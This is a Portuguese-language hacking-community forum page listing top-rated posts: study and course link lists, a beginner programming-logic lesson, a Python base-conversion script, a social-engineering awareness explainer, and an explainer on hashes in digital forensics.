Ir para conteúdo

Tabela de Classificação


Conteúdo Mais Visto

Exibindo conteúdo com a maior reputação desde 28em todas áreas

  1. 7 pontos
    E ae galera, trago pra vocês uns materiais para estudo. Nada de apostila, tudo pela internet. Eu peguei o básico do básico e reuni. Não precisa estudar todo dia, toda hora, estudem quando tiver vontade. É serio, uma hora você vai falar "agora eu vou estudar", espere esse momento chegar. Eu segui dessa seguinte maneira: GNU/Linux > Redes > Programação > Hacking. Vamos lá. No nosso repositório você encontra de tudo, todo tipo de material. Link do nosso repositório http://pc.cd/VfbotalK Senha: issonaoehumasenha5/9 INTRODUÇÃO AO GNU/Linux INTRODUÇÃO -> https://goo.gl/Sjih4K CURSO GNU/Linux -> https://goo.gl/SlZgwD DOMINANDO O TERMINAL -> https://goo.gl/Ka6Uu1 A ARVORE DE DIRETÓRIO DO LINUX -> https://goo.gl/g5SmeI INTRODUÇÃO AO BÁSICO DO BÁSICO DE REDES: TCP/IP -> https://goo.gl/XPNEH9 UDP -> https://goo.gl/1M5SYF DIFERENÇA DE TCP E UDP -> https://goo.gl/j0MtY0 HUB, SWITCH, ROTEADOR E MODEM -> https://goo.gl/SAQbkI BRIDGE -> https://goo.gl/Wu4hcj NAT -> https://goo.gl/c8NjHH DNS -> https://goo.gl/bsMdUR GATEWAY -> https://goo.gl/OFOkkZ DHCP -> https://goo.gl/5gnZrc LISTA DE PROTOCOLOS DE REDES -> https://goo.gl/EJ1YvZ CURSO DE REDES -> https://goo.gl/XijVVc INTRODUÇÃO A PROGRAMAÇÃO LOGICA DE PROGRAMAÇÃO -> https://goo.gl/9GNGHs PYTHON -> https://goo.gl/xkzYkk C -> https://goo.gl/KYgUKn C# -> https://goo.gl/C4zvN0 C++ -> https://goo.gl/HuhBSs PHP -> https://goo.gl/LymDBl RUBY -> https://goo.gl/kgcA1g JAVA -> https://goo.gl/q0sGmN HACKING SOU INICIANTE, QUERO SER HACKER, POR ONDE COMEÇO -> https://goo.gl/TiM39Y OS PRIMEIROS PASSOS DE UM HACKER INICIANTE -> https://goo.gl/BLIM5k COMO SER UM HACKER DE SUCESSO -> https://goo.gl/QrgQjW COMO FUNCIONAM OS CYBER ATAQUES PARTE 1 -> https://goo.gl/55SDY4 COMO FUNCIONAM OS CYBER ATAQUES PARTE 2 -> https://goo.gl/QYaRHc KOSHIMARU KISARA - INTRODUÇÃO AO CURSO HACKER -> https://goo.gl/2rl55d CAVEIRATECH - INTRODUÇÃO AO HACKING E PENTEST -> https://goo.gl/KsTfvw ANONIMATO -> Anonsurf: https://goo.gl/vEyWOu && Whonix: https://goo.gl/VSajTM CANAIS COM CONTEUDO DE TECNOLOGIA/HACKER -> https://goo.gl/TB4px8
  2. 4 pontos
    Lógica de programação - Introdução Tudo o que a gente for fazer na vida segue uma lógica, um raciocínio antecipado, na maioria das vezes inconsciente. Na programação também é assim, você vai precisar desenvolver um raciocínio lógico pra resolver os seus problemas e ter o resultado da maneira que você quer ou precisa. Exemplo: Quando você vai sair de casa e ta chovendo, o seu primeiro pensamento é "preciso pegar um guarda chuva, se não vou me molhar". E na lógica de programação você vai aprender a tomar a escolha que é melhor pra sua situação e/ou necessidade. Exemplo: A sua casa fica em uma quadra e você precisa ir na padaria de cima, você pode atravessar a rua pra comprar os pães indo e voltando mais rápido, porem com o trafego de carros você corre mais risco de ser atropelado. Ou você pode ir até a faixa de pedestres, esperar o sinal para os carros pararem, atravessar, comprar o pão, esperar o mesmo sinal e voltar. Assim você foi com menos velocidade mas com mais segurança. Dependendo do que você quiser fazer, vai ter que optar pelo mais importante, segurança ou desempenho. Basicamente é isso que você precisa aprender pra começar, lógica de programação, aprender a raciocinar de forma lógica dependendo de suas necessidades para atingir o seu objetivo da forma que você preferir.
  3. 3 pontos
    #RESPOSTANDO MEU POST DO FACEBOOK! [Material / Conteúdo] - Olá soldados! Rolem para baixo e encontrarão uma lista de links de cursos GRATUITOS na área de desenvolvimento e afins. ( Espero que gostem ) *FRONTEND? --> Curso Completo de HTML5 (42 aulas):https://goo.gl/wmNpMp Curso Aprenda HTML em 1 hora (22 aulas):https://goo.gl/j9qAkI Curso completo de CSS3 (22 aulas)https://goo.gl/Vt86Jz Curso Básico de CSS (12 aulas)https://goo.gl/Vt86Jz Curso de Bootstrap (16 aulas)https://goo.gl/etyOd5 Curso de Less (6 aulas)https://goo.gl/A4JiqE Curso de Sass (18 aulas)(inglês)https://goo.gl/iykixV Curso de CSS3 com Sass e Compass (9 aulas)https://goo.gl/dqlya3 Curso completo de Javascript (46 aulas)https://goo.gl/ejyvXS Curso Completo de jQuery (56 aulas)https://goo.gl/kSOZC7 Curso de Angular (17 aulas)https://goo.gl/C9XHch Curso de Angular 2 (56 aulas)https://goo.gl/JmTqv9 ______________________________________________________________________________________ *BACKEND? --> Curso Básico de PHP (20 aulas)https://goo.gl/DDygB3 Curso Completo de PHP (108 aulas)https://goo.gl/bacNLk Curso de NodeJS (21 aulas)https://goo.gl/LIru11 Curso de Aplicações Web Ricas com ExtJS (44 aulas)https://goo.gl/CbbU3p Curso de Ruby (15 aulas)https://goo.gl/NO4EQC Curso de Ruby On Rails (49 aulas)https://goo.gl/zc5tfa Curso de Gulp (11 aulas)(inglês)https://goo.gl/Gcfxzn Curso de Grunt (16 aulas)(inglês)https://goo.gl/EL8156 FRAMEWORKS DE PHP? --> ______________________________________________________________________________________ Curso de Laravel (23 aulas)https://goo.gl/dni1CO Curso de CodeIgniter (12 aulas)https://goo.gl/iH6JDS Curso de Zend 2 (29 aulas)https://goo.gl/FA2hff Curso de Zend 3 (13 aulas)(inglês)https://goo.gl/SEdVu9 BANCO DE DADOS (BDD)? --> Curso Completo de MySQL (37 aulas)https://goo.gl/s4iWjQ Curso de MongoDB (9 aulas)https://goo.gl/Kn66is ______________________________________________________________________________________ *Sistema de Gerenciamento de Conteúdo (CMS)? --> Curso Básico de Wordpress (34 aulas)https://goo.gl/0UOc2b Curso Completo de Criação de Temas para Wordpress (31 aulas)https://goo.gl/3Haey1 Curso Completo de criação de Portais com Wordpress (65 aulas)https://goo.gl/lMk3NE Curso de Desenvolvimento de Plugins para o Wordpress (15 Aulas)https://goo.gl/Lc6Wje Curso Básico de Magento (39 aulas)https://goo.gl/kJHo2S Curso Express de Desenvolimento de Temas para o Magento (4 aulas)https://goo.gl/Ccrgqg Curso Completo de Desenvolvimento de Temas para o Magento (25 aulas)(inglês)https://goo.gl/O01Bg8 Curso de Desenvolvimento de Módulos para o Magento (10 aulas)(inglês)https://goo.gl/63cSYc Curso Básico de Drupal 7 (40 aulas)https://goo.gl/CMzPDQ Curso de Views no Drupal 7 (30 aulas)(Português de Portugal)https://goo.gl/tH9XrQ Curso de Desenvolvimento de Temas para o Drupal 7 (58 aulas)(Português de Portugal)https://goo.gl/X5OTvo Curso de Desenvolvimento de Módulos para o Drupal 7 (11 aulas)(inglês)https://goo.gl/isdJau ______________________________________________________________________________________ *MOBILE? --> Curso de Desenvolvimento de Apps para Android (30 aulas)https://goo.gl/Acuien Curso de Desenvolvimento de Apps para iOS com Swift (28 aulas)https://goo.gl/tFsqYX Curso de Desenvolvimento de Apps para iOS com Objective C (51 aulas)https://goo.gl/7dK80B Curso de Desenvolvimento de Apps com PhoneGap/Cordova (34 aulas)https://goo.gl/AzB6lR Curso de Desenvolvimento de Apps com Ionic (14 aulas)https://goo.gl/h06Nae Curso de Desenvolvimento de Apps com Ionic 2 (10 aulas)https://goo.gl/Iooa9q Curso Recriando o Uber com Ionic 2 (19 aulas)(inglês)https://goo.gl/kgsY6z Curso Criando um App de gestão financeira com Ionic 2 (10 aulas)https://goo.gl/UYZr9x Curso de Interfaces Responsivas com jQuery Mobile (20 aulas)https://goo.gl/3qH8Vu Curso de Interfaces Responsivas com Sencha Touch (6 aulas)https://goo.gl/xmTjKZ ______________________________________________________________________________________ *SERVIDORES? --> Curso Básico de GIT (8 aulas)https://goo.gl/o0mkcX Curso Configurando um Servidor Cloud na Digital Ocean (3 aulas)https://goo.gl/MXYWX6 Curso Configurando um Servidor Amazon AWS (7 aulas)https://goo.gl/zBKGR4 Curso Básico de Linux Debian (17 aulas)https://goo.gl/mtr0Bn Curso Completo de Linux Ubuntu (81 aulas)https://goo.gl/QtWif0 Curso Completo de Servidor Linux Debian (35 aulas)https://goo.gl/OrWzE8 Curso Avançado de Linux Ubuntu - Comandos no Terminal (15 aulas)https://goo.gl/jjvnBG Curso de Windows Server 2016 (15 aulas)https://goo.gl/q8D7j9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CRÉDITOS: CaveiraTech
  4. 3 pontos
    Hacker Inside - Vol. 1.pdf Hacker Inside - Vol. 2.pdf HackerInsideVol.3.pdf HackerInsideVol.4.pdf HackerInsideVol.5.pdf
  5. 3 pontos
    Apostilas de Segurança, Segurança da informação, Anonimato na internet, Firewall, Criptografia, e etc. Aula de seguranca.pdf firewall proteçãp.pdf firewall tuto basico.pdf Fundamentos de sistemas de segurança da informaçao.pdf Gestão de Segurança da Informação.pdf Tutorial como ficar invisível.pdf Técnicas Hacker soluções para segurança 1.pdf Técnicas Hacker soluções para segurança 2.pdf Sua Rede Wireless é Realmente Segura.pdf Sistema para identificar invasão.pdf Segurança Ofensiva.pdf Introdução à Segurança da Informação.pdf Manual da Segurança da Informação.pdf extensoes_seguranca_DNS.pdf
  6. 2 pontos
    Salve salve pessoal... Nessa postagem estarei deixando alguns sites que possuem conteúdo relacionado à Redes de Computadores... Segue os link aí pessoal 1º Portal GSTI LINK: https://www.portalgsti.com.br/2010/08/material-completo-de-redes-de-computadores.html -> Aqui você vai encontrar: 1.1. CURSO COMPLETO DE REDES (I, II) OFERECIDOS PELA CECIERJ 1.2. LIVROS (EBOOKS) DE REDES DE COMPUTADORES Material excepcional disponibilizado pela Escola Superior de Redes 1.3. SLIDES DE AULAS DE REDES DE COMPUTADORES DISPONIBILIZADO NA WEB PELA UFES(Universidade Federal do Espírito Santo) 1.4. SLIDES DE AULAS DE REDES DE COMPUTADORES II DISPONIBILIZADO PELA UFCG(Universidade Federal de Campina Grande) <3 1.5. SLIDES DE AULAS DE REDES DE COMPUTADORES III DISPONIBILIZADO PELO Professor Fabricio Breve 1.6. SLIDES DE AULAS DE REDES DE COMPUTADORES IV DISPONIBILIZADO PELO Professor Adriano Mauro Cansian 1.7. Vídeoaulas gratuitas Redes de Computadores ministradas pelos professores Cláudio de C. Monteiro, Alex Coelho, Evanderson Alex Almeida e Vinícius de M. Rios. 2º Canal Boson Treinamentos LINK: https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU -> Aqui você encontra uma playlist com vários assuntos ligados à Redes de Computadores 3º Canal do Professor Kretcheu LINK: https://www.youtube.com/user/kretcheu2001/playlists -> Aqui você encontra os vídeos do canal do Professor Kretcheu que ensina muito bem Redes Bem Pessoal, por hoje é só... Espero que vocês possam estudar bastante Lembrem-se Redes é ESSENCIAL para todo profissional de TI, especialmente se você quer trabalhar na área de Segurança da Informação <3 Abraço!!!
  7. 2 pontos
    CONVERTER BASES NUMÉRICAS Nome: - Versão: - Autor: @Lord13 Data: 22/06/2017 Descrição: Esse é um algoritmo genérico que demonstra o funcionamento de conversão entre bases, na verdade é até um script em Python, mas uma breve lida no código nos permite obter uma ideia. Lembrando que: Ele somente converte de base 10 para qualquer base b | 2 <= b <= 64), e "desconverte" qualquer base para decimal. Onde o base64 não infere no base64 real, somente é um sistema numérico que possui 64 possibilidades (0-9, A-Z, a-z, +, /). Download: def converter_base(num, base): lista1 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/" lista = [] while num != 0: dec1 = num % base num = num / base lista.append(lista1[dec1]) lista.reverse() return "".join(lista) def desconverter_base(num, base=10): numeros = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/" num = str(num)[::-1] if base > 36 else str(num)[::-1].upper() if any([i in num for i in numeros[base:]]): raise TypeError('Invalid input number for this base!') resultado = 0 for i in range(len(num)): resultado += (base**i) * (int(numeros.index(num[i]))) return resultado
  8. 2 pontos
    Bom dia Sociedade! Bem, me chamo Albérico, faço parte no grupo do facebook há algum tempo, trabalho com tecnologia há 9 anos; sempre contribuo com o tratamento de alguns problemas computacionais, postados por alguns membros lá . Sou estudante de Ciência da Computação, como a tecnologia surgiu na minha vida!?, antes de partir para o lado de desenvolvimento de software, cursei um tec em eletrônica no ano de 2008 e , tive a sorte de ser apresentado ao C++ e assembly na matéria de microcontroladores, por ser linguagens de baixo nível e se comunicam bem com hardware e etc (acredito que todos saibam os detalhes e talz), bem, quando vi e conheci essa parte da tecnologia, decidi que era o que eu queria para minha vida, terminei o curso em 2010 e comecei a planejar como aperfeiçoar meus conhecimentos, uma parte que eu queria compartilhar é a seguinte, conheçam tudo o que conseguirem dentro do seu tempo, tudo na tecnologia se comunica de forma ordenada, uma verdadeira sintonia de 0's e 1's , bem, depois de trabalhar com linguagens de baixo nível, percebi que estava ficando acomodado na área e, em 2013 comecei a fazer um tecnólogo em computação gráfica, cara, fiquei impressionado com o quanto a gente não conhece dessa área, aprendi muito de frontend , em 2016 terminei C.G e sai com outra perspectiva, ainda não satisfeito, eu queria mais!, esse entusiasmo é assustador, no ano de conclusão do C.G desenvolvi um aplicativo IOS para a faculdade como um T.C.C, bem, um coordenador da área de computação se interessou pelo projeto e me ofereceu uma bolsa para cursar Ciência da Computação, a faculdade é particular e etc, claro qu eu aceitei neh! kkkkkk bem, alguns detalhes finais: -Antes de toda essa jornada, eu não tinha perspectiva de profissão, trabalhava em um lava-rápido; -Você é responsável pelo seu destino; -Busque o conhecimento, seja cadenciado e diante do caos, mantenha o foco e calma; -Nessa jornada, recebi várias criticas de vários tipos; -Hoje, posso dizer que sou um Full Stack literalmente, desde hardware ao software; -Na foto anexada, o coordenador "careca"ao meio que me fez o convite no dia da formatura. Recentemente criei uma conta no github, algumas tecnologias que usei foi o C#,Swift ,html,css e js, sou indiferente ao uso delas, não carrego nenhuma bandeira a favor ou contra do uso delas, mas as que eu conheço mais features são C, C++ e C#; https://github.com/AlbericoD bem, é isso!
  9. 2 pontos
    Muitos tem dúvida de como adicionar som no Kali Linux e é um passo bem simples, digite o código abaixo no seu Terminal e veja a mágica acontecer! Caso você queira desabilitar o som do Kali Linux novamente (provavelmente não mas se quiser...) é apenas digitar o seguinte comando: Se tiver qualquer dúvida não deixe de perguntar nos comentários!!
  10. 2 pontos
    Como fazer root no seu dispositivo - método atualizado 2017 Fala galera , hoje vou estar mostrando como se faz o acesso root no seu aparelho é importante que verifiquem a compatibilidade do seu aparelho. Tutorial Root -
  11. 2 pontos
    ATAQUES DE ENGENHARIA SOCIAL: TUDO QUE VOCÊ PRECISA SABER! Chamamos de engenharia social qualquer estratégia não-técnica usada pelos hackers que, em grande parte, dependem da interação humana e geralmente envolvem iludir o usuário para desrespeitar práticas de segurança padrão, como abrir links maliciosos, baixar arquivos suspeitos ou compartilhar informações confidenciais que permitam ao hacker atingir seus objetivos. O sucesso das técnicas de ataques de engenharia social depende da habilidade do hacker demanipular as vítimas para que executem certas ações ou ofereçam informações. Como não envolve nenhum aspecto técnico que possa ser reconhecido pelas ferramentas de segurança tradicionais, os ataques de engenharia social estão entre as maiores ameaças às empresas atualmente. ]A maior diferença entre os ataques de engenharia social e o trabalho de hacking tradicional é que os ataques de engenharia social não envolvem o comprometimento ou a exploração de softwares ou sistemas. Quando é bem-sucedido, esse tipo de ataque permite que os hackers ganhem acesso legítimo a informações confidenciais. Como funcionam os ataques de engenharia social Hackers que recorrem a ataques de engenharia social não deixam de ser fraudadores e estelionatários. Eles usam técnicas do tipo com o objetivo de ganhar acesso legítimo à rede e aos dados da empresa roubando credenciais de usuários autorizados para se passar por funcionários da própria empresa. Um dos hackers mais famosos do mundo, começou muito jovem a praticar engenharia social para pequenos ganhos. Chegou a revirar o lixo de empresas para conseguir informações e fazer telefonemas enganosos (você pode conhecer um pouco mais sobre essa história clicando É comum que esse tipo de cibercriminoso se aproveite da inocência e da natureza prestativa de alguns usuários. Eles podem, por exemplo, ligar para algum deles simulando ter de resolver algum incidente, dizendo então que necessita do acesso urgente à rede corporativa. Os ataques também podem ser feitos por meio das redes sociais. Os cibercriminosos podem apelar a uma série de sentimentos por meio dos perfis de redes sociais das vítimas, descobrindo, por exemplo, sua posição dentro da empresa, seus amigos e seus gostos pessoais. As táticas servem para convencer os usuários a abrir anexos infectados com malwares, persuadir funcionários a divulgar informações sensíveis ou até assustá-los para que instalem softwares infectados com malwares. Principais tipos de ataques de engenharia social Os tipos mais comuns de ataques de engenharia social incluem baiting, phishing, pretexting, quid pro quo, spear phishing e tailgating. Soluções como firewalls, filtros de e-mail e ferramentas de monitoramento da rede e de dados podem ajudar a mitigar essas ameaças, porém, a conscientização do usuário é a tarefa mais importante para combater os ataques de engenharia social. Contar com funcionários capazes de reconhecer e evitar os tipos mais comuns de ataques de engenharia social é a melhor defesa nesses casos. Saiba mais sobre os tipos mais comuns de ações de engenharia social a que os funcionários devem saber reagir:[/align] Baiting Por meio dessa técnica, hackers deixam à disposição do usuário um dispositivo infectado com malware, como um pen-drive ou um CD. A intenção é despertar a curiosidade do indivíduo para que insira o dispositivo em uma máquina a fim de checar seu conteúdo. O sucesso dos ataques de baiting depende de três ações do indivíduo encontrar o dispositivo, abrir seu conteúdo e instalar o malware sem perceber. Uma vez instalado, o malware permite que o hacker tenha acesso aos sistemas da vítima. A tática envolve pouco trabalho por parte do hacker. Tudo que ele precisa fazer é infectar um dispositivo e ocasionalmente deixá-lo à vista do alvo, seja na entrada ou no interior dos escritórios. O dispositivo pode ser, por exemplo, um pen-drive contendo um arquivo com nome “chamativo”, como “folha salarial 2017”. Em 2011, a Bloomberg relatou que, em um teste feito com funcionários do governo norte-americano, 60% das pessoas pegaram um pen-drive deixado no estacionamento e plugaram nos computadores do escritório. No caso dos dispositivos que tinham um logo oficial, 90% instalaram o arquivo. Phishing O e-mail de phishing, apesar de já existir há anos, ainda é uma das técnicas mais comuns de engenharia social pelo alto nível de eficiência. O phishing ocorre quando um hacker produz comunicações fraudulentas que podem ser interpretadas como legítimas pela vítima por alegarem vir de fontes confiáveis. Em um ataque de phishing, os usuários podem ser coagidos a instalar um malware em seus dispositivos ou a compartilhar informações pessoais, financeiras ou de negócio. Apesar de o e-mail ser o modo mais tradicional para o envio de phishing, esse tipo de ataque também pode vir na forma de um contato telefônica ou de uma mensagem no Facebook, por exemplo. Os piores ataques de phishing se aproveitam de situações trágicas com o objetivo de explorar a boa vontade das pessoas, fazendo com que passem informações pessoais e de pagamento para realizar doações, por exemplo. Alguns e-mails de phishing são incrivelmente fáceis de identificar, no entanto, há os que são extremamente convincentes, simulando, por exemplo, comunicações do banco e empresas de cartão de crédito e comunicados oficiais da própria empresa pedindo para que os funcionários façam download de um novo software de segurança corporativa. Pretexting Por meio do pretexting, os hackers fabricam falsas circunstâncias para coagir a vítima a oferecer acesso a informações e sistemas críticos. Nesse caso, os hackers assumem uma nova identidade ou papel para fingir que são alguém de confiança da vítima. Tudo que o cibercriminoso precisa é dar uma olhada nos perfis da vítima nas redes sociais para descobrir informações como data e local de nascimento, empresa, cargo, nomes de parentes, colegas de trabalho, amigos, entre outros. Depois, basta enviar um e-mail (ou outro tipo de comunicação) à vítima fingindo a necessidade de confirmar dados para garantir seu acesso a algum sistema específico. Pode ser, por exemplo, um e-mail supostamente da equipe de TI coagindo a vítima a divulgar suas credenciais. Quid pro quo Um ataque de quid pro quo ocorre quando um hacker requer informações privadas de alguém em troca de algo. “Quid pro quo” basicamente significa “isso por aquilo”, em que o cibercriminoso oferece algo à vítima em troca de informações sensíveis. A tática mais comum envolve se passar por alguém da TI e abordar diversas vítimas encontrar alguém com um problema real de TI. Sob instruções do hacker, a vítima então dá acesso a códigos, desabilita programas vitais e instala malwares achando que conseguirá resolver seu problema. Outra tática bastante usada é a de simular uma pesquisa em que funcionários passam uma série de informações sensíveis em troca de brindes, como canetas e canecas. Spear phishing O spear-phishing é uma forma mais sofisticada de phishing que foca em indivíduos e organizações específicas. Nesse tipo de ataque, o hacker se passa por algum executivo ou outro membro chave da empresa e aborda funcionários com intuito de obter informações sensíveis. Os cibercriminosos podem obter, por meio das redes sociais, informações sobre o alvo e o quadro organizacional da empresa. Depois disso, basta enviar alguma comunicação fingindo ser, por exemplo, um dos executivos da empresa com uma demanda urgente que requer uma transação financeira imediata para uma conta específica. Esse tipo de ataque costuma ter altas taxas de sucesso no convencimento de funcionários para que executem ações específicas ou passem informações sensíveis. Segundo o SANS Institute Report de 2016, os ataques de spear-phishing estão cada vez mais efetivos pois são tão tecnicamente convincentes que a maioria dos destinatários não se dá ao trabalho de procurar por pequenos indícios de fraude ou tentar se comunicar com o remetente por outro meio. A técnica também está sendo muito utilizada de forma direcionada para pequenas e médias empresas, pois geralmente são menos maduras em segurança. Confira o nosso artigo para saber mais! Tailgating O tailgating é uma técnica física de engenharia social que ocorre quando indivíduos não autorizados seguem indivíduos autorizados até localizações seguras. O objetivo é obter ativos valiosos e informações confidenciais. É o caso, por exemplo, de quando alguém pede para o outro “segurar a porta” porque esqueceu seu cartão de acesso, ou pede seu smartphone ou computador emprestado para fazer “algo rapidinho”, mas na verdade instala malwares e rouba dados da máquina.
  12. 2 pontos
    Conheça a Fsociety Brasil GRUPO NO FACEBOOK -> facebook.com/groups/fsocietybrasil PÁGINA NO FACEBOOK -> facebook.com/FsocietyBrasiloficial SITE -> fsocietybrasil.org BLOG -> fsocietybrasil.org/blog FORUM -> forum.fsocietybrasil.org CANAL -> https://goo.gl/nR59vA E-MAILS DE CONTATO -> [email protected] // [email protected] PAGINA DE PROJETOS -> fsocietybrasil.org/projetos/ STAFF -> fsocietybrasil.org/staff/ REPOSITÓRIO -> http://pc.cd/VfbotalK (password: issonaoehumasenha5/9) ADMINISTRADORES - FACEBOOK Thauan C Santos (facebook.com/neroismito) Rodrigo Lp (facebook.com/asdinbnqwe) Wesley Paulo (facebook.com/wptiozarak) ADMINISTRADORES - FORUM Apoc (forum.fsocietybrasil.org/profile/18-apoc) Arkham_ (forum.fsocietybrasil.org/profile/161-arkham_) Gh0s7 (forum.fsocietybrasil.org/profile/1-gh0s7) Pedro (forum.fsocietybrasil.org/profile/6-pedro) EQUIPE - PROJETOS/BLOG/IDEIAS/DESIGN Daniela Schutt Iago Blambila Marcio Garcia Carlos Néri Correia Patterson Silva Dante Toledo Gustavo Allgayer Gustavo Edny Kaique Fermino Kauê Nycolas Leonardo Lourenço Samuel Paz Thiago Souza Victor Oliveira de Lima William Alves William Stroher Possa Felipe Estrela PARCEIROS WordPress - eSecurity - HowTo Online - The Anony Bay
  13. 2 pontos
    O que é o Hash Code na Computação Forense? -Primeiro vamos esclarecer o termo → Computação Forense Computação Dããã kkk, acho que vocês sabem né? PCs, coisas do gênero. Forense Refere-se ao foro judicial, aos tribunais de justiça. Forense se refere a evidências que serão levadas ao foro. Continuando… - O que é o Hash Code na Computação Forense? Hash Code são códigos gerados para comparações de arquivos. São “únicos” e cada arquivo tem seu código de forma diferente. Computação Forense é o ramo que utiliza de técnicas da computação para validação de provas digitais em um foro(tribunal). As Hashs são de grande importância. E são usadas na computação forense para comprovar se determinada cópia de um arquivo ou se determinada versão de um arquivo bate com a versão original. Serve para averiguar a veracidade de uma evidência. Se ela é ou não autêntica. Se foi ou não alterada. A hash é gerada através de um script que vai analisar byte a byte de determinado arquivo para gerar de forma única, um determinado código que só aquele arquivo terá. Se um único bit for alterado a hash gerada é diferente. Existem tipos de hash diferentes. Funções hashes que trabalham com um certo padrão. Alguns exemplos vocês podem conferir nessa lista aqui: https://en.wikipedia.org/wiki/List_of_hash_functions Uma das hashs mais utilizadas é a MD5. Um código hash MD5 possui sempre 32 caracteres. -Exemplo de código: “f580a6698db38a0e411491e53daa989b” Um código hash é unidirecional. Ou seja, um software/script vai gerar um código hash a partir da análise de cada bit de um determinado arquivo, mas não é possível descobrir um arquivo através do processo reverso. A hash é uma função criptografia, pois trabalha com alguns conceitos da mesma, mas não é e nem deve ser confundido com uma criptografia em si. Pois seu código tem a função exclusiva de verificar a integridade de determinada evidência. Bom, quando geramos uma hash MD5 de um arquivo, por exemplo, fsociety.txt, obteremos essa hashf580a6698db38a0e411491e53daa989b Se alguém alterar um ponto sequer, um byte, o código gerado já é totalmente diferente. “Mas ae tio, se a hash só tem 32 caracteres(em MD5), ela uma hora repete não é?” Matematicamente falando isso é obvio. Sim, ela se repete. Temos 32 caracteres que são gerados em Hexadecimal(sistema numérico com 16 números possibilidades por caracter.) Logo, para saber quantas possibilidades podem ser geradas temos a conta: 16^32 = 3,4028236692093846346337460743177e+38. Bom, apesar de parecer ter quantidades altas de possibilidades, se você parar pra pensar que existem milhares de arquivos no seu PC, e que existem milhares de PCs, logo se dará conta de que as hashs podem, e irão repetir. Pois é, mas eu não menti quando disse que as Hashs são particulares para cada arquivo. O que acontece, é, que apesar delas poderem se repetir ao redor do mundo, se eu tenho uma evidência e alguém a altera, ela não vai se repetir. Não se o código do script que gera a hash for bem desenvolvido. Pode ser que um arquivo, uma foto lá na argentina tenha a mesma hash, mas não afeta nada se estamos querendo comparar a hash do nosso fsociety.txt, obviamente compararemos com outro fsociety.txt que possa ter sido adulterado. Então nesse caso a hash será diferente. Se o algoritmo dessa hash for bem escrito. Pois ele evitara conflito com esses arquivos similares. Aliás, é essa sua principal função, não é? Verificar a autenticidade da evidencia. Como um arquivo diferente pode ter a mesma hash? -Pela limitação de caracteres do código Hash. -E mesmo que os bytes sejam diferente pela limitação do código o algoritmo dele fará com que a repetição ocorra mesmo que demore. Pense na hash com uma empresa que fabrica fechadura. Ao redor do mundo, é possível que tenha uma fechadura que abra com a chave da sua casa, mas qual a chance dessa ser a porta do seu vizinho? Entende? Sabemos que as chaves(é, chave de casa mesmo) tem um tamanho de, por exemplo 5 centímetros. Mas sabemos que só 3 centímetros são aqueles que de fato entram na fenda para abrir a porta. Uma empresa que fabrica as fechaduras e suas chaves, logo vai ter uma organização na logística, para que as chaves similares não caiam na mesma região. A mesma coisa se aplica a um código bem estruturado de uma hash. Não vai se repetir com evidências similares. Não é porque repetem que não são seguras. Assim como a fabricação de fechaduras. Ninguém vai deixar de usá-las. Pelo contrário. Se tratando de um cenário forense. SEMPRE iremos gerar a hash de uma evidência em pelo menos 2 tipos de hash diferentes. Os geralmente utilizados são MD5 e o SHA1. -MD5 Hash f580a6698db38a0e411491e53daa989b -SHA1 hash a91d816e49276c507e4edd16fdae308f4896e59a Repare que os códigos são diferentes, são dois tipos de códigos gerados de formas distintas. Mas a falhas? Sim, como vocês já estão cansados de saber: tudo tem falhas, afinal, tudo em máquina ainda é feito por humanos e, mesmo quando for feito por máquinas, ainda temos humanos por trás, e nós somos falhos. Aprendemos com falhas. Pode ser que um determinado suspeito, seja hábil em manipulação de bytes e consiga forjar uma hash igual. Forçar os bytes de forma a conseguir enganar o gerador de hashs. Então teremos: Nosso fsociety.txt(original) e o fsociety.txt(maliciosamente adulterado) com hashs iguais. Isso a princípio vai enganar quem só gerar uma única hash. É por isso que em um cenário forense, ao antes de iniciar o processo de coleta de dados também se deve tirar duas hashs. Mesmo que intencionalmente haja manipulação dos bytes para “passar” batido em MD5, a SHA1 irá acusar diferente. Pois trabalham de forma diferente. Uma curiosidade, é que alguns sites como o do Kali Linux, e sites que disponibilizam arquivos .ISO ou alguns outros arquivos por conexão P2P, costumam disponibilizar no site de download, a hash dessa .ISO. Isso, pra que ao final do download, você possa fazer a verificação e averiguar se a ISO está integra. Se está completa. Mas e se você preferir baixar de outro site, mas a hash bateu igual? “Devo confiar? “ Bom, aí vai de cada um. Se alguém tiver alterado o arquivo, após baixado, você pode gerar a hash com softwares para verificar. Utilize 2 dois tipos. Se ainda sim tiver dúvida a pergunta que fica é: O que você está baixando, é tão crítico pra você verificar e verificar? É um sofware simples ou é um sistema operacional. Na dúvida, baixe o arquivo de fonte confiável ou faça a verificação da hash em 2 tipos. Evite confiar apenas na hash do site se você estiver baixando de outro endereço e usou a hash apenas para verificação. Se necessário, tente contato pedindo a outra hash. Pode ser que você seja atendido(ou não) ================================================================================================================================================================== Existem sites, que fazem a conversão de strings(frases ou palavras) em hashs. E em alguns deles, o site armazena a palavra que você digitou, então quando você colocar a hash e for fazer o inverso, ele vai acusar a palavra já digitada. Não é feita uma conversão. Essa conversão direta não existe porque ele não “traduz” as palavras. Mas, analisa os bytes, apenas é comparada a hash no banco de dados do site. Um deles é o https://defuse.ca/checksums.htm#checksums OBS: Então tome muito cuidado quando digitar suas senhas para gerar Hashs nesses sitese, você pode estar deixando elas em um banco de dados sem perceber. Não entrei em méritos técnicos pois o intuito era esclarecer um pouco do que é a hash para computação forense e a sua aplicação. Espero ter ajudado um pouco com o que eu sei. Pra quem quiser, softwares gratuitos para Windows: - HashCalc: Gera hashs de um arquivo ou texto. - QuickHash Útil para comparação de hashs entre arquivos. Existem vários outros softwares mas esses estão bons de início se quiserem fazer testes.
  14. 2 pontos
    Arquivos PDF disponíveis para Download. Apostila-Básica-Sobre-Hardware.pdf Hardware_o_guia_definitivo.pdf cursoMontagemManutencao.pdf Apostila Hardware.pdf Apostila Sobre Hardware.pdf Hardware curso completo 3 edição.pdf
  15. 2 pontos
